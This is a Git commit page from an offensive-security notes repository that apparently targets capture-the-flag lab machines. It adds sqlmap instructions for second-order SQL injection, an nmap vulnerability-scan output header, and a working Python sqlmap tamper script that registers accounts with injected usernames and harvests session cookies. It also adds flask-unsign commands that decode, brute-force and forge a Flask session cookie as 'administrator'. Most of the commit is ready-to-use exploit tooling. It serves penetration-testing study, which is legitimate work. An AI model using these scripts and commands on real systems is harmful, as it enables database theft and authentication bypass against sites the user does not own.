whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

sqli

This commit is contained in:
Stefan Etringer 2023-02-19 20:16:49 +01:00
parent 2ea19b21c9
commit bbe93ff8ff
6 changed files with 122 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
Exploits/Databases/SQLmap.md
View File

@ -2,6 +2,7 @@
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git) * [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet) * [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
@ -31,6 +32,22 @@ sqlmap -u http://<target-IP>/site.php --forms --dump-all
|--tables|Show tables| |--tables|Show tables|
|-T|Specify table| |-T|Specify table|
### Advanced Features
#### Second Order SQL Injection
In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5)
An example oneliner including a tamper script and a first and second request captured in Burpsuite
```sh
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
```
The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.
Dump the databases, tables afterwards
## Other Tools ## Other Tools
### Damn Small SQLi Scanner (DSSS) ### Damn Small SQLi Scanner (DSSS)

0
Exploits/Databases/nmap-full.gnmap Normal file
View File

0
Exploits/Databases/nmap-full.nmap Normal file
View File

6
Exploits/Databases/nmap-full.xml Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Feb 18 20:46:42 2023 as: nmap -p 8000 -oA nmap-full -sC -sV -&#45;script vuln 10.10.200.251 -->
<nmaprun scanner="nmap" args="nmap -p 8000 -oA nmap-full -sC -sV -&#45;script vuln 10.10.200.251" start="1676749602" startstr="Sat Feb 18 20:46:42 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="8000"/>

74
Exploits/Databases/second_order_tamper.py Normal file
View File

@ -0,0 +1,74 @@
#!/usr/bin/env python
'''
The following line is an example on how to utilize the script
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py \
--second-req $(pwd)/second.req -p username --technique=U --dbms mysql
'''
import re
import requests
from lib.core.enums import PRIORITY # Imported by SQLmap
__priority__ = PRIORITY.NORMAL
def dependencies():
'''
define dependencies
'''
pass
URL = "http://10.10.212.150:8000"
def login_account(payload):
'''
Create account and return the cookie
The SQLi is in the username field
'''
proxies = {'http': 'http://127.0.0.1:8080'}
#cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
params = {
"username": payload, # random.randint(100000, 99999999), # SQLi field
"email": "admin@admin.com",
"password": "password123" # Needs to be similar to '-r req.txt'
}
url = f"{URL}/register"
_ = requests.post(
url, data=params, timeout=10, # cookies=cookies,
verify=False, allow_redirects=True, proxies=proxies
)
url = f"{URL}/login"
response = requests.post(
url, timeout=10, data=params, # cookies=flask_cookie,
verify=False, allow_redirects=True, proxies=proxies
)
#print(response.headers)
flask_cookie = re.search(
'session=(.*?);', response.headers['Set-Cookie']).group(1)
# url = f"{URL}/logout"
# response = requests.post(
# url, timeout=10, cookies=flask_cookie,
# verify=False, allow_redirects=True, proxies=proxies
# )
return f"session={flask_cookie}"
def tamper(payload, **kwargs):
'''
The function used by SQLmap
'''
headers = kwargs.get("headers", {})
headers["Cookie"] = login_account(payload)
# login_account(payload)
return payload
#if __name__ == "__main__":
# login_account("yo")

25
Exploits/Python/Flask Cookies.md Normal file
View File

@ -0,0 +1,25 @@
# Flask Cookies
They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.
Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.
## Read Flask Cookie
Using `flask-unsign` this can be done via
```sh
flask-unsign --decode --cookie '<COOKIE>'
```
## Unsign the Flask Cookie
Unsigning the cookie can be done in the following way
```sh
flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval
```
## Sign the Flask Cookie
Siging the cookie can be done via
```sh
flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
```